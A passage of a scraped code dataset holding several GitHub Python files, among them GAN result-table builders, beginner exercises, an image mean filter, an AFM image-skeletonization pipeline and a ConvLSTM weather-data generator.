cbar=None)\n#axes[1,0].imshow(blur)\n#axes[2,0].imshow(blur)\n#axes[0,0].imshow(img)\n#sns.heatmap(detectEdges(img), ax=axes[0,1],cbar=None)\n#sns.heatmap(detectEdges(blur), ax=axes[1,1],cbar=None)\nplt.imshow(detectEdges(img))\n\n#sns.heatmap(auto_canny(blur), ax=axes[2,1],cbar=None)\nplt.tight_layout()\n\n#axes[0].axis(\"off\")\nplt.show()\n\n# plt.show()","repo_name":"ferozemohideen/ml-footprint-detection","sub_path":"test_image_blur.py","file_name":"test_image_blur.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14040876296","text":"\"\"\"\nSelect categories and output the latex table.\n\"\"\"\nimport torch, sys, os, argparse\nsys.path.insert(0, \".\")\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom lib.misc import *\nfrom lib.op import torch2numpy\nfrom evaluate import read_results\n\n\ndef get_table_suit(G_name, ds):\n ds_name = \"Bedroom\" if ds == \"bedroom\" else \"Church\"\n FGs = [formal_name(G_name) + \"-\" + ds_name]\n methods = [\"LSE\", \"NSE-1\", \"NSE-2\"]\n loss_types = [\"N\"]\n lrs = [\"0.001\"]\n lw_types = [\"SP\"]\n ls = [\"Trunc\"]#[\"Tmixed\", \"Ttrunc\"]\n els = [\"Etrunc\"]#[\"Emixed\", \"Etrunc\"]\n row_groups = [FGs, methods, loss_types, ls]\n col_groups = [lw_types, lrs, els]\n row_names = enumerate_names(groups=row_groups)\n col_names = enumerate_names(groups=col_groups)\n\n Gs = [G_name + \"_\" + ds]\n loss_types = [\"lnormal\"]\n lrs = [\"lr0.001\"]\n lw_types = [\"lwsoftplus\"]#, \"lwnone\"]\n ls = [\"lstrunc-wp\"] #[\"lsnotrunc-mixwp\", \"lstrunc-wp\"]\n els = [\"elstrunc-wp\"] #[\"elsnotrunc-mixwp\", \"elstrunc-wp\"]\n row_groups = [Gs, methods, loss_types, ls]\n col_groups = [lw_types, lrs, els]\n row_args = enumerate_args(groups=row_groups)\n col_args = enumerate_args(groups=col_groups)\n for row_name, row_arg in zip(row_names, row_args):\n for col_name, col_arg in zip(col_names, col_args):\n row = \"-\".join(row_name)\n col = \"-\".join(col_name)\n arg = \"_\".join(row_arg + col_arg)\n yield row, col, arg #row_arg, col_arg\n\n\ndef get_class_table(data_dir, G_name, ds):\n dic = OrderedDict()\n for row_name, col_name, arg in get_table_suit(G_name, ds):\n if row_name not in dic:\n dic[row_name] = OrderedDict()\n fpath = f\"{data_dir}/{arg}.txt\"\n if not os.path.exists(fpath):\n print(f\"=> {fpath} not found\")\n dic[row_name][col_name] = -1\n else:\n mIoU, cIoUs = read_results(fpath)\n clabels = []\n cious = []\n for i in range(len(cIoUs)):\n if float(cIoUs[i]) > 0.1:\n cious.append(float(cIoUs[i]))\n clabels.append(labels[i])\n dic[row_name][col_name] = cIoUs\n return dic\n\n\ndef get_common_labels(dic):\n common_labels = set()\n for k1 in dic.keys():\n for k2 in dic[k1].keys():\n cious = dic[k1][k2]\n for i in range(len(cious)):\n if cious[i] > 0.1:\n common_labels.add(labels[i])\n common_labels = list(common_labels)\n common_label_indice = [labels.index(n) for n in common_labels]\n common_label_indice.sort()\n return common_label_indice\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dir\", default=\"results/full_label_SE/\", help=\"\")\n args = parser.parse_args()\n labels = read_ade20k_labels()[1:]\n G_labels = OrderedDict()\n gdic = OrderedDict()\n # read classwise data\n for G_name in [\"pggan\", \"stylegan\", \"stylegan2\"]:\n G_labels[G_name] = OrderedDict()\n gdic[G_name] = OrderedDict()\n for ds in [\"bedroom\", \"church\"]:\n gdic[G_name][ds] = OrderedDict()\n dic = get_class_table(args.dir, G_name, ds)\n label_indice = get_common_labels(dic)\n selected_labels = np.array(labels)[label_indice]\n G_labels[G_name][ds] = selected_labels\n ndic = OrderedDict()\n for k1 in dic.keys():\n for k2 in dic[k1].keys():\n ndic[f\"{k1}_{k2}\"] = OrderedDict()\n cious = np.array(dic[k1][k2])[label_indice]\n for n, v in zip(selected_labels, cious):\n ndic[f\"{k1}_{k2}\"][n] = v\n gdic[G_name][ds][k1] = cious.mean()\n\n strs = str_table_single(ndic)\n with open(f\"results/tex/catselect_class_{G_name}_{ds}.tex\", \"w\") as f:\n f.write(str_latex_table(strs))\n\n strs = 
str_table_multiple(gdic)\n with open(f\"results/tex/catselect_global.tex\", \"w\") as f:\n f.write(str_latex_table(strs))\n\n with open(\"figure/selected_labels.csv\", \"w\") as f:\n for G in [\"stylegan2\", \"stylegan\", \"pggan\"]:\n for ds in [\"bedroom\", \"church\"]:\n s = \",\".join([G + \"_\" + ds] + list(G_labels[G][ds]))\n f.write(s + \"\\n\")","repo_name":"AtlantixJJ/LinearGAN","sub_path":"figure/category_selection.py","file_name":"category_selection.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"3095968257","text":"# 48\r\ncount = 0\r\nwhile True:\r\n\tdigit, sum = map(int, input().split())\r\n\tif digit == 0 and sum == 0:\r\n\t\tbreak\r\n\tfor i in range(10):\r\n\t\tif digit + i == sum:\r\n\t\t\tcount += 1\r\n\r\nprint(count)\r\n\r\n# 49\r\nfrom math import sqrt\r\nhorizontal, vertical, diagonal = map(int, input(\"sides:\").split(\",\"))\r\nif sqrt(horizontal ** 2 + vertical ** 2) == diagonal:\r\n\tprint(\"rectangle\")\r\nelse:\r\n\tprint(\"not rectangle\")\r\n\r\n# 50\r\nwords = input(\"string:\").split(\"Python\")\r\nprint(\"Java\".join(map(lambda segment: segment.replace(\"Java\", \"Python\"),\r\n words)))\r\n\r\n# 51\r\nnumber = input(\"number:\")\r\nprint(\r\n int(\"\".join(sorted(number, reverse=True))) - int(\"\".join(sorted(number))))\r\n\r\n# 52\r\nfrom math import floor\r\n\r\ndef isPrime(number):\r\n\tif number < 2:\r\n\t\treturn False\r\n\tfor i in range(2, floor(number / 2) + 1):\r\n\t\tif number % i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\ncount = 0\r\nnumber = int(input(\"number:\"))\r\ni = 1\r\nsum = 0\r\nwhile count < number:\r\n\tif isPrime(i):\r\n\t\tsum += i\r\n\t\tcount += 1\r\n\ti += 1\r\n\r\nprint(sum)\r\n\r\n# 53\r\nfrom math import floor\r\n\r\ndef isPrime(number):\r\n\tif number < 2:\r\n\t\treturn False\r\n\tfor i in range(2, floor(number / 2) + 1):\r\n\t\tif number % i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\nnumber = int(input(\"number:\"))\r\n\r\ncount = 0\r\nfor i in range(floor(number / 2)):\r\n\tif not (isPrime(i) and isPrime(number - i)):\r\n\t\tcontinue\r\n\tcount += 1\r\n\r\nprint(count)\r\n\r\n# 54\r\nnumber = int(input(\"number:\"))\r\nprint((number * number + number + 2) // 2)","repo_name":"RedGuy12/python","sub_path":"4/48-54.py","file_name":"48-54.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26256209269","text":"import cv2\r\nimport numpy as np\r\n\r\n# 定义6*6数据全为1的模板,用其乘以6*6矩阵中所有的图像数据,再除以36得到一个均值,把均值替换掉中心元素\r\n\r\nimg = cv2.imread('image11.jpg', 1)\r\ncv2.imshow('src', img)\r\n\r\nimgInformation = img.shape\r\nheight = imgInformation[0]\r\nwidth = imgInformation[1]\r\ndst = np.zeros((height, width, 3), np.uint8)\r\n\r\nfor i in range(3, height-3):\r\n for j in range(3, width-3):\r\n sum_b = int(0) # 统计模板中的均值\r\n sum_g = int(0)\r\n sum_r = int(0)\r\n for m in range(-3, 3):\r\n for n in range(-3, 3):\r\n (b, g, r) = img[i+m, j+n] # 读取图像中的每一个像素\r\n sum_b = sum_b + int(b) # b本来是uint8类型,转换成int类型是防止相加的时候出现越界\r\n sum_g = sum_g + int(g)\r\n sum_r = sum_r + int(r)\r\n b = np.uint8(sum_b / 36) # 求b的均值\r\n g = np.uint8(sum_g / 36)\r\n r = np.uint8(sum_r / 36)\r\n dst[i, j] = (b, g, r) # 把新的b,g,r填充到目标图像中\r\n\t\t\r\ncv2.imshow('dst', dst)\r\ncv2.waitKey(0)","repo_name":"QHXCoder2017/Code-practice-in-Image-Processing","sub_path":"image enhancement/均值滤波.py","file_name":"均值滤波.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16601215478","text":"# force floating point division. Can still use integer with //\nfrom __future__ import division\n# other good compatibility recquirements for python3\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n# This file is used for importing the common utilities classes.\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys,copy,scipy\nsys.path.append(\"../../../../../../../\")\nfrom Research.Perkins.AnalysisUtil.Images import ImageUtil\nfrom Research.Perkins.AnalysisUtil.ForceExtensionAnalysis import FEC_Util\nfrom GeneralUtil.python import GenUtilities,PlotUtilities,CheckpointUtilities\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom skimage.filters import gaussian\nfrom skimage.morphology import skeletonize\nfrom skimage import measure,img_as_uint\nfrom skimage.segmentation import active_contour\nimport networkx as nx\nfrom scipy.interpolate import splprep, splev, interp1d,UnivariateSpline\n\nfrom sklearn.neighbors import NearestNeighbors\nfrom route.postman import single_chinese_postman_path\n\nfrom ImageUtil import subtract_background\n\nclass transform:\n def __init__(self,name,function,imshow_kw=dict(cmap=plt.cm.afmhot)):\n self.name = name\n self.function = function\n self.imshow_kw = imshow_kw\n\n\ndef realistic_min_max(image,q_low=90,q_high=99.9):\n data = image.height_nm()\n low,high = np.percentile(data.flatten(),[q_low,q_high])\n return low,high\n \ndef plot_with_background_corrected(args,imshow_kw_list=None):\n n = len(args)\n fig = PlotUtilities.figure((3.5,2*n))\n for i,a in enumerate(args):\n ax = plt.subplot(n,1,(i+1))\n m_list = imshow_kw_list[i]\n if (m_list['cmap'] == plt.cm.afmhot):\n vmin,vmax = realistic_min_max(a)\n else:\n vmin,vmax = 0,None\n imshow_kwargs = dict(vmin=vmin,vmax=vmax,**m_list)\n im = ImageUtil.make_image_plot(a,pct=50,imshow_kwargs=imshow_kwargs)\n if (i == 0):\n ImageUtil.smart_colorbar(im=im,ax=ax,fig=fig)\n if (i < n-1):\n PlotUtilities.xlabel(\"\",ax=ax)\n PlotUtilities.no_x_label(ax=ax)\n ImageUtil.smart_colorbar(im=im,ax=ax,fig=fig,add_space_only=True)\n else:\n ImageUtil.smart_colorbar(im=im,ax=ax,fig=fig,add_space_only=True)\n return fig\n\n\ndef _safe_apply(images,f):\n to_ret = []\n for ex in images:\n tmp = copy.deepcopy(ex)\n ret = f(ex)\n assert type(ret) is np.ndarray , \"{:s} didn't return array\".format(f)\n tmp.height = ret\n to_ret.append(tmp) \n return to_ret \n\ndef threshold(im,threshold_nm,rel_pct=50):\n \"\"\"\n Returns: im, height zeroed where height-rel_pct_of_height < threshold_nm\n \"\"\"\n height_rel = im.height_nm() \n height_rel -= np.percentile(height_rel,rel_pct)\n zero_idx = np.where(height_rel < threshold_nm)\n height_new = copy.deepcopy(im.height)\n height_new[zero_idx] = 0\n return height_new\n\ndef binarize(image):\n \"\"\"\n binarizes a single image: set to 1 where the image is non-zero\n \"\"\"\n binary = copy.deepcopy(image)\n binary[binary > 0] = 1\n return binary\n\ndef correct_background(images,**kw):\n \"\"\"\n See: threshold_images, except subtracts the AFM background \n \"\"\"\n return _safe_apply(images,lambda x: subtract_background(x,**kw))\n\n\ndef blur_images(images,sigma=0.5,**kw):\n \"\"\"\n See: thresholdimages, except adds a gaussian blur with sigma\n \"\"\"\n return _safe_apply(images,lambda x: gaussian(x.height,sigma=sigma,**kw))\n\ndef threshold_images(images,threshold_nm=0.2):\n \"\"\"\n thresholds the heights for each of images. 
pass by copy\n \"\"\"\n return _safe_apply(images,lambda x: threshold(x,threshold_nm))\n\ndef binarize_images(images):\n \"\"\"\n binarizes the heights for each of images. pass by copy\n \"\"\"\n return _safe_apply(images,lambda x: binarize(x.height))\n\ndef skeletonize_images(images):\n \"\"\"\n returns: the skeletonized version of the (assumed already binary) images\n \"\"\"\n return _safe_apply(images,lambda x: skeletonize(x.height))\n\ndef label_images(images):\n \"\"\"\n returns: the labelled versions (ie: connected components) of the (assumed\n skeletonized) images\n \"\"\"\n return _safe_apply(images,lambda x: measure.label(x.height,background=0))\n\ndef skeleton_filter(images):\n to_ret = []\n for i in images:\n tmp = copy.deepcopy(i)\n props = measure.regionprops(tmp.height)\n n = len(props)\n n_lost = 0\n for p in props:\n diameter = p.equivalent_diameter\n if (diameter < 5):\n for i,j in p.coords:\n tmp.height[i,j] = 0 \n n_lost += 1\n if (n_lost < n):\n to_ret.append(tmp)\n return to_ret\n\n\ndef cache_images(cache_dir,func,**kw):\n \"\"\"\n either caches or re-func to get an image transformaiton\n\n Args:\n cache_dir: where the cache is, or will be created\n func: functor (no arguments), re-reads everything if needed\n **kw: passed to CheckpointUtilities.multi_load\n Returns:\n cached imags\n \"\"\"\n return CheckpointUtilities.multi_load(cache_dir,load_func=func,\n name_func=FEC_Util.name_func,**kw)\n\ndef get_coordinate_path(coords): \n \"\"\"\n Returns a path of 'coords' (assumed a single coordinates of a \n skeleton) such that:\n\n 1) the start (endpoint) has the highest, second-lowest distance (the lowest\n distance is always +/- 1 pixel; the second lowest will be the greatest\n for an endpoint)\n \n 2) all other points are separated from each other by at most 1 pixel\n\n Args:\n coords: the two-column array of pixel distances\n Returns:\n the sorted coordinate list\n \"\"\"\n n_coords = len(coords)\n distances = scipy.spatial.distance_matrix(coords,coords,p=2)\n for i in range(n_coords):\n distances[i,i] = np.inf\n # check that the skeletonization is OK\n maximum_of_minimum_distances = np.sqrt(2)\n max_of_min = max(np.min(distances,axis=0))\n assert abs(max_of_min - maximum_of_minimum_distances) < 1e-6 , \\\n \"Skeletonization failed?\"\n # POST: distances okay; all pixels at most 1 away in x and y\n # Now we need to decide on (possible arbitrary) endpoints. These should\n # be the two nodes with the largest *second* lowest distances (all have\n # at least one neighbor which is +/- 1 pixel; 'interior' nodes have at \n # least two '1-pixel' neighbords\n second_lowest_distances = [sorted(row)[1] for row in distances]\n # sorted from low to high; what we want is the highest, second lowest\n sort_idx_second_highest = np.argsort(second_lowest_distances)\n endpoint = sort_idx_second_highest[-1]\n # POST: have endpoint. 
Add all the points with their two closest to the \n # graph (except the endpoint, where we only add its closest)\n # create a graph of all the pixels\n G = nx.Graph()\n n_neightbors = 2\n # sort the data so the endpoint is first?\n print(endpoint)\n sorted_idx = list(np.arange(endpoint,n_coords)) + \\\n list(np.arange(0,endpoint))\n sorted_idx= np.array(sorted_idx)\n distances = distances[sorted_idx]\n coords = coords[sorted_idx]\n for i in range(n_coords):\n dist_tmp = distances[i]\n closest_nodes = np.argsort(dist_tmp)\n # add the closest N\n j = 0\n G.add_edge(i,closest_nodes[0],weight=1)\n G.add_edge(i,closest_nodes[1],weight=1)\n print(\"connectivity\")\n remove_all_but_one = list(nx.minimum_edge_cut(G))\n for r in remove_all_but_one[:-1]:\n g.remove_edge(*r)\n print(nx.node_connectivity(G))\n nx.draw(G)\n plt.show()\n graph,path = single_chinese_postman_path(G)\n print(path,n_coords)\n for i in range(len(path)):\n print(len(set(path[:i])),i,n_coords)\n \"\"\"\n see: \nhttps://stackoverflow.com/questions/18794308/algorithm-to-cover-all-edges-given-starting-node\n\nhttps://networkx.github.io/documentation/networkx-1.9.1/reference/generated/networkx.algorithms.matching.max_weight_matching.html#networkx.algorithms.matching.max_weight_matching\n\n also https://groups.google.com/forum/#!topic/networkx-discuss/NxbsY2dzkNk\n \n https://healthyalgorithms.com/2009/03/23/aco-in-python-minimum-weight-perfect-matchings-aka-matching-algorithms-and-reproductive-health-part-4/\n \"\"\"\n coords_x = np.array(coords[:,0])\n coords_y = np.array(coords[:,1])\n\n return coords[path]\n\ndef snake_fit(image,initial,w_line=5,w_edge=0,max_px_move=1,beta=1,gamma=0.1):\n to_fit = image\n min_x,max_x = np.min(initial[:,0]),np.max(initial[:,0])\n min_y,max_y = np.min(initial[:,1]),np.max(initial[:,1])\n fudge_x = int(np.ceil((max_x-min_x) * 0.1))\n fudge_y = int(np.ceil((max_y-min_y) * 0.1))\n lower_x = 0#max(0,min_x-fudge_x)\n lower_y = 0#max(0,min_y-fudge_y)\n #to_fit = to_fit[lower_x:max_x+fudge_x,\n # lower_y:max_y+fudge_y]\n initial_x_shifted = initial[:,0]-lower_x\n initial_y_shifted = initial[:,1]-lower_y\n initial = np.array((initial_x_shifted,initial_y_shifted)).T\n min_image,max_image = np.min(to_fit),np.max(to_fit)\n to_fit = ((to_fit - min_image)/(max_image - min_image)) * 256\n to_fit = to_fit.astype(np.uint8)\n initial_snake = initial.astype(np.float64)\n snake = active_contour(to_fit,convergence=1e-3,max_iterations=5e3,\n snake=initial_snake,w_line=w_line,\n w_edge=w_edge,beta=beta,gamma=gamma,\n bc='fixed',max_px_move=max_px_move)\n snake[:,0] += lower_x\n snake[:,1] += lower_y\n return snake\n\n\ndef plot_fitting(image,coords,snake_coords=None):\n endpoint_coord = coords[0]\n n_coords = len(coords)\n x = coords[:,0]\n y = coords[:,1]\n idx = np.arange(n_coords)\n plt.imshow(image.T,origin='lower')\n plt.plot(coords[:,0],coords[:,1],',')\n plt.plot(endpoint_coord[0],endpoint_coord[1],'go')\n plt.plot(coords[:,0],coords[:,1],'r-',alpha=0.3)\n plt.xlim(min(coords[:,0])*0.8,max(coords[:,0]*1.1))\n plt.ylim(min(coords[:,1])*0.8,max(coords[:,1]*1.1))\n if (snake_coords is not None):\n plt.plot(snake_coords[:,0],snake_coords[:,1],'r.-',linewidth=0.3)\n\ndef get_spline_obj(image,coords,fudge=3,k=3,smooth_f_n=2):\n \"\"\"\n Returns:\n tuple of \n \"\"\"\n n_coords = len(coords)\n coords_x = coords[:,0]\n coords_y = coords[:,1]\n # threshold the image outside of the skeleton area of interest\n image_thresh = copy.deepcopy(image)\n zero_x_low = coords_x - fudge\n zero_x_high = coords_x + fudge\n zero_y_low 
= coords_y - fudge\n zero_y_high = coords_y + fudge\n # get a mask with ones in the region...\n m_arr = np.zeros(image.height.shape)\n for x_l,x_h,y_l,y_h in zip(zero_x_low,zero_x_high,\n zero_y_low,zero_y_high):\n m_arr[x_l:x_h,y_l:y_h] = 1\n image_thresh.height *= m_arr\n where_non_zero_image_xy =np.where(image_thresh.height > 0)\n where_non_zero_x,where_non_zero_y = where_non_zero_image_xy\n \"\"\"\n # Essentially trying to parameterize a curve basd on the skeleton. see: \nstackoverflow.com/questions/31464345/fitting-a-closed-curve-to-a-set-of-points\n also:\nstackoverflow.com/questions/32046582/spline-with-constraints-at-border/32421626#32421626\nstackoverflow.com/questions/36830942/reordering-image-skeleton-coordinates-to-make-interp1d-work-better\n https://stackoverflow.com/questions/41659075/how-to-specify-the-number-of-knot-points-when-using-scipy-splprep\n\n ... also ...\n\n https://stackoverflow.com/search?q=parametric+image+fit\n\n especially:\n\n stackoverflow.com/questions/22556381/approximating-data-with-a-multi-segment-cubic-bezier-curve-and-a-distance-as-wel/22582447#22582447\n\n and\n\n stackoverflow.com/questions/22556381/approximating-data-with-a-multi-segment-cubic-bezier-curve-and-a-distance-as-wel/22582447#22582447\n \"\"\"\n n_non_zero = where_non_zero_x.size\n # get the projection of the data onto the skeleton\n skel_idx = []\n weights = []\n for i,(x,y) in enumerate(zip(where_non_zero_x,where_non_zero_y)):\n diff = np.sqrt((coords_x-x)**2 + (coords_y-y)**2)\n closest_skeleton_idx = np.argmin(diff)\n skel_idx.append(closest_skeleton_idx)\n weights.append(image_thresh.height[x,y])\n # sort the projection array by the distance along...\n sort_idx = np.argsort(skel_idx)\n sorted_image_x = where_non_zero_x[sort_idx]\n sorted_image_y = where_non_zero_y[sort_idx]\n f_excess = where_non_zero_y.size/len(coords_x)\n # weight; sum by default is such that sum is M (being the size). 
use that\n weights = np.array(weights)[sort_idx]\n weights /= np.sum(weights)\n weights *= weights.size\n n_points = sorted_image_x.size\n tck,_ = splprep([sorted_image_x,sorted_image_y],w=weights,per=0,\n s=f_excess*n_points*smooth_f_n,k=k,u=None,quiet=0)\n return image_thresh,tck\n\ndef run():\n \"\"\"\n \n\n Args:\n param1: This is the first param.\n \n Returns:\n This is a description of what is returned.\n \"\"\"\n in_dir = \"./data/\"\n cache_dir_fmt = \"./cache_{:s}/\"\n cache_dir_raw = cache_dir_fmt.format(\"raw\")\n out_dir = in_dir\n force_def = dict(force=True)\n GenUtilities.ensureDirExists(out_dir)\n images = ImageUtil.cache_images_in_directory(pxp_dir=in_dir,\n cache_dir=cache_dir_raw,\n limit=4)\n corrected_dir = cache_dir_fmt.format(\"corrected\")\n label_dict = dict(cmap=plt.cm.spectral)\n transforms = [transform(\"corrected\",correct_background),\n transform(\"gaussian\",blur_images),\n transform(\"threshold\",threshold_images),\n transform(\"binarize\",binarize_images),\n transform(\"skeletonize\",skeletonize_images),\n transform(\"label\",label_images,label_dict),\n transform(\"skeleton_filter\",skeleton_filter,label_dict)]\n last = images\n all_transforms = [last]\n for tx in transforms:\n tmp_dir = cache_dir_fmt.format(tx.name)\n last = cache_images(tmp_dir,func = lambda: tx.function(last),\n **force_def)\n all_transforms.append(last)\n last_dir = tmp_dir\n # fit a spline to the original data using each of the connected\n # regions from the skeletonization \n for image,skeleton in zip([images[-2]],[last[-2]]):\n regions = measure.regionprops(skeleton.height)\n region = regions[0]\n coords = get_coordinate_path(region.coords)\n unew = np.linspace(0,1,endpoint=True,num=10*max(coords.shape))\n image_thresh,tck = get_spline_obj(image,coords)\n out = splev(unew,tck)\n out_x ,out_y = out[0],out[1]\n min_x,max_x = min(out_x),max(out_x)\n range_v = (max_x-min_x) * 0.2\n xlim = lambda : plt.xlim([min_x-range_v,max_x+range_v])\n ylim = lambda : plt.ylim([min(out_y)-range_v,max(out_y+range_v)])\n plt.subplot(2,1,1)\n plt.imshow(skeleton.height.T)\n plt.plot(coords[:,0],coords[:,1],'r-')\n xlim()\n ylim()\n plt.subplot(2,1,2)\n plt.imshow(image_thresh.height.T)\n plt.plot(out_x,out_y,'r-')\n plt.plot(coords[0,0],coords[0,1],'go')\n xlim()\n ylim()\n plt.show()\n fig = PlotUtilities.figure()\n plot_fitting(snake_input.height,coords)\n plt.plot(interp_x(ind_sort), interp_y(ind_sort), 'r,')\n out_name = \"{:s}_fit.png\".format(out_dir)\n PlotUtilities.savefig(fig,out_name)\n exit(1)\n # subtract the linear backround from each, save to a new cache \n for i in range(len(images)):\n pipeline = [x[i] for x in all_transforms]\n # add in the keywords for the first image...\n imshow_kw = [dict(cmap=plt.cm.afmhot)] + \\\n [tx.imshow_kw for tx in transforms]\n fig = plot_with_background_corrected(pipeline,imshow_kw_list=imshow_kw)\n img_name = FEC_Util.name_func(i,images[i])\n out_name = \"{:s}{:s}.png\".format(last_dir,img_name)\n PlotUtilities.savefig(fig,out_name)\n\n \n \n \nif __name__ == \"__main__\":\n run()\n","repo_name":"prheenan/Research","sub_path":"Perkins/Projects/DNA/protein-interactions/prc2/bulk_analysis/main_bulk_analysis.py","file_name":"main_bulk_analysis.py","file_ext":"py","file_size_in_byte":16301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"37383278602","text":"aux = a = 0\nb = 1\nn = int(input('Digite um Numero: '))\ni = 0\nprint('1 >> ',end='')\nwhile i != n:\n aux = a + b;\n a = b;\n b = aux;\n i += 1\n print(f'{aux} >> ',end='')\n","repo_name":"williancae/pythonGuanabara","sub_path":"mundo02/Exercicios/ex065.py","file_name":"ex065.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43935825455","text":"#\n# NOTE: This workflow is for predicting weather, using convolutional LSTM\n# architechture. The training data is a set of reanalysis data in the \n# past for one specific domain that are regular gridded at regular \n# intervals in the NETCDF format. This system consists of three stages\n# as given below: \n# \n# - Stage 1: reading NETCDF input and generating training dataset with a \n# given image sizes, number of frames, number of sample, and\n# number of channels, which are saved by pickle;\n# - Stage 2: import the saved pickle data and split this data into a lag\n# pair (X,Y), with the lag time (forecast lead time) prescribed \n# in advance). This stage will then build a convolutional LSTM\n# model with a given training/validation ratio, and then save\n# the train model under the name \"nwp_model_hhh\", where hhh is\n# forecast lead time. It also saves the history of training\n# in the form of pickle format for later analysis.\n# - Stage 3: testing the performance of the model by importing the best \n# trained model from Stage 2, and make a list of prediction \n# to be validated with the test data. Note that this stage is\n# best to run in the Jupyter notebook mode so the prediction\n# can be visuallly checked. \n#\n# INPUT: This Stage 1 script requires an input dataset in the NETCDF that contains\n# regular time frequency (e.g, every 3 or 6 hours), and should include\n# all basic meterological variables such as u, v, T, RH, pressure,... \n#\n# Remarks: Note that these data should be on the standard 19 vertical\n# levels 1000, 975, 950, 925, 900, 850, 800, 750, 700, 650, 600, \n# 550, 500, 450, 400, 350, 300, 250, 200. Also, all field vars must\n# be resized to cover an area of interest. \n#\n# OUTPUT: A set of training data in the with shape (sample_size, ny, nx, nchannel).\n# Note that array setting for NETCDF and Python are arraged such that\n# ny is the number of rows (depth), while nx is the number of col (width). \n#\n# HIST: - 12, Oct 23: Created by CK\n# - 10, Nov 23: revised for a better workflow for future upgrades\n# and sharing\n# - 16, Nov 23: Added 3-channel option for data generator\n#\n# AUTH: Chanh Kieu (Indiana University, Bloomington. 
Email: ckieu@iu.edu) \n#\n#==========================================================================\nimport netCDF4\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport cv2\nimport random\nimport pickle\nimport libtcg_netcdfloader as tcg_loader\nimport libtcg_utils as tcg_utils\nimport libtcg_fnl as tcg_fnl\nimport sys\nimport re\n#\n# This function returns a kist composing of [numpy data, label] that reads from the\n# set of NETCDF data under netcdf data path\n#\ndef main(rootdir,interval,nx,ny,number_channels,nframe,yyyy):\n print('Input data dir is: ',rootdir)\n frame = np.zeros([1,nframe,ny,nx,number_channels])\n i = 0 \n j = 0\n for img in tqdm(os.listdir(rootdir)):\n try:\n infile=rootdir+'/'+img\n cycle = tcg_fnl.path2cycle(infile) \n print('Processing file:',infile,cycle,interval*(nframe-1),frame.shape)\n last_cycle = tcg_utils.add_hour(cycle,interval*(nframe-1))\n last_file = tcg_fnl.cycle2path(rootdir,last_cycle)\n if len(yyyy) >= 4:\n match_year = re.search(\"fnl_\"+yyyy, infile) \n else:\n match_year = re.search(\"fnl_\", infile)\n #print('---> Last cycle/file:',last_cycle,last_file,match_year)\n if os.path.isfile(last_file) and match_year:\n if number_channels == 12: \n a = tcg_loader.frame12channels(rootdir,cycle,interval=interval,\n nx=nx,ny=ny,number_channels=number_channels,nframe=nframe)\n elif number_channels == 3:\n a = tcg_loader.frame3channels(rootdir,cycle,interval=interval,\n nx=nx,ny=ny,number_channels=number_channels,nframe=nframe)\n else:\n print(\"Channels must be 3 or 12 at the moment...exit\")\n exit()\n print('Data shape is :',a.shape,cycle)\n if i == 0:\n frame[0,:,:,:,:] = a[:,:,:,:]\n else:\n b = np.expand_dims(a, axis=0)\n frame = np.concatenate((frame, b), axis=0)\n del b\n i = i + 1\n else:\n print('Do not have enough cycles for frames or unmatch year...skip',cycle,last_cycle)\n except Exception as e:\n pass\n if match_year: j += 1\n if j > 199: \n print(\"Save the first 200 frames only... stop now\")\n break\n return frame\n#\n# This function reads in a list of 4 dim and plot a random field for quick check\n#\ndef check_visual(array_raw,plot_sample=1):\n print(\"Plotting one example from raw data input\")\n temp = np.array(array_raw[plot_sample])\n plot_channel = 2\n fig, axs = plt.subplots(2, 4, layout=\"constrained\",figsize=(13, 5))\n for i,ax in enumerate(axs.flat):\n CS = ax.contourf(temp[i,:,:,plot_channel])\n #ax.clabel(CS, inline=True, fontsize=10)\n #ax.colorbars()\n ax.set_title('t = 0')\n ax.grid()\n\n #plt.figure(figsize=(11, 8))\n #plt.subplot(1,4,2)\n #CS = plt.contour(temp[2,:,:,1])\n #plt.clabel(CS, inline=True, fontsize=10)\n #plt.title('t=-2')\n #plt.grid()\n plt.show()\n#\n# This is the main program. Need to edit several parameters including\n# rootdir, img_nx, img_ny, number_channels, nframe, interval_hr. 
See the\n# section below for where to change these parameters.\n#\nif __name__ == '__main__':\n n = len(sys.argv)\n print(\"Total arguments input are:\", n)\n print(\"Name of Python script:\", sys.argv[0])\n if n < 2:\n print(\"Need one input argument for the year to process...Stop\")\n print(\"+ Example for year 2007: nwp_convlstm_p1.py 2007\")\n print(\"+ Example for all years: nwp_convlstm_p1.py _\")\n exit()\n yyyy = str(sys.argv[1])\n\n rootdir=\"/N/project/hurricane-deep-learning/data/ncep_extracted_41x161_13vars/\"\n img_nx = 161 # number of lon points/width/col\n img_ny = 41 # number of lat points/depth/row\n number_channels = 3 # number of channels \n nframe = 9 # number of time frames\n interval_hr = -6 # hor interval between frames\n array_raw = main(rootdir,interval_hr,img_nx,img_ny,number_channels,nframe,yyyy)\n print(\"Raw output shape (nsample,nframe,ny,nx,nchannel) is: \",array_raw.shape)\n #\n # visualize a few variables for checking the input data. SHould be \"no\" \n # if running in the job submission mode at all times.\n #\n check_visualization = \"no\"\n if check_visualization== \"yes\":\n check_visual(array_raw,plot_sample=0)\n #\n # randomize data and save training data to an output for subsequent use\n #\n np.random.shuffle(array_raw)\n outfile = 